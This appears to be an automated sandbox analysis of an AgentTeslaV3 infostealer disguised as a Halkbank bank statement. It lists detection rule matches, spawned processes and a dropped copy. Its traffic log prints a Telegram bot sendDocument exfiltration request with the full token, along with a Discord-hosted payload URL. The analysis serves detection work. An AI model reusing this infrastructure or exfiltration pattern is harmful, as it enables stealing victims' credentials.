                    Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownHTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bfc9e9f2a6Host: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                    Source: global trafficHTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49749 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49774 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49779 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49781 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49785 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49789 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 17.2.Ffnbziuo.exe.335c788.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.4174768.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 17.2.Ffnbziuo.exe.3334768.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 17.2.Ffnbziuo.exe.33ac7a8.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 15.0.InstallUtil.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 15.0.InstallUtil.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 15.0.InstallUtil.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 15.0.InstallUtil.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 15.2.InstallUtil.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 15.0.InstallUtil.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.csLarge array initialization: .cctor: array initializer size 11689
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, type: SAMPLEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.0.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 18.0.Ffnbziuo.exe.890000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 17.2.Ffnbziuo.exe.335c788.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 17.0.Ffnbziuo.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.4174768.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 17.2.Ffnbziuo.exe.3334768.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 17.2.Ffnbziuo.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 17.2.Ffnbziuo.exe.33ac7a8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 18.2.Ffnbziuo.exe.890000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_017A4908
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_06330598
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_06458D68
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_06455270
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_06455A18
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_06456868
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_06452020
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_0645B9C0
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_0645B7F0
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_0645B797
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_064595C9
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_06452350
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_06456B02
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_06453108
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 0_2_06330CB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0169F080
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0169F3C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633C740
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633EC50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06338310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06337110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331662
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633166A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633165E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316A6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633169A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633169E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316F6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316FA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316D6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316DA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316DE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316CA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063316CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331732
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331736
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633173A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331722
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331726
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633172A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633172E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331712
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331716
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633171A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633171E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331702
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331706
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633170A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_0633170E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331742
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06331746
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06338260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06333330
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06330040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_063399A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A59230
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A5661E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A54218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A5CC70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A535B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A58DF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A509D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A59AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A5420A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A52A78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A50888
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A591DA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A5AD37
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_06A5B160
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_008248F8
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_00824908
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_05588D68
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_05583108
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_0558B9C0
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_05586868
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_05582020
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_05585270
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_05585A18
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_05582350
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_05586B02
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_055B4300
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 17_2_05460CB8
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 18_2_01204908
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 18_2_05DF8D68
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 18_2_05DF6868
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 18_2_05DF2020
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 18_2_05DF5270
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 18_2_05DF5A18
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 18_2_05DF3108
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 18_2_05DF2350
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 18_2_05DF6B0B
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 18_2_05E240B0
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 18_2_05CD0CB8
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeBinary or memory string: OriginalFilename vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.400268491.00000000050E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXbdqzwgvzotiiytiobf.dll" vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWukxFEBImOJXHePxokROUtHPQAqEHsoOn.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382251635.00000000086BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: get_OriginalFilename vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXbdqzwgvzotiiytiobf.dll" vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000000.261249129.0000000000E02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIdksgm.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.402627186.0000000007F81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: get_OriginalFilename vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWukxFEBImOJXHePxokROUtHPQAqEHsoOn.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.411249230.0000000009043000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWukxFEBImOJXHePxokROUtHPQAqEHsoOn.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeBinary or memory string: OriginalFilenameIdksgm.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Ffnbziuo.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeVirustotal: Detection: 34%
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeReversingLabs: Detection: 39%
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeFile read: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeJump to behavior
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe"
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe "C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe "C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe"
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
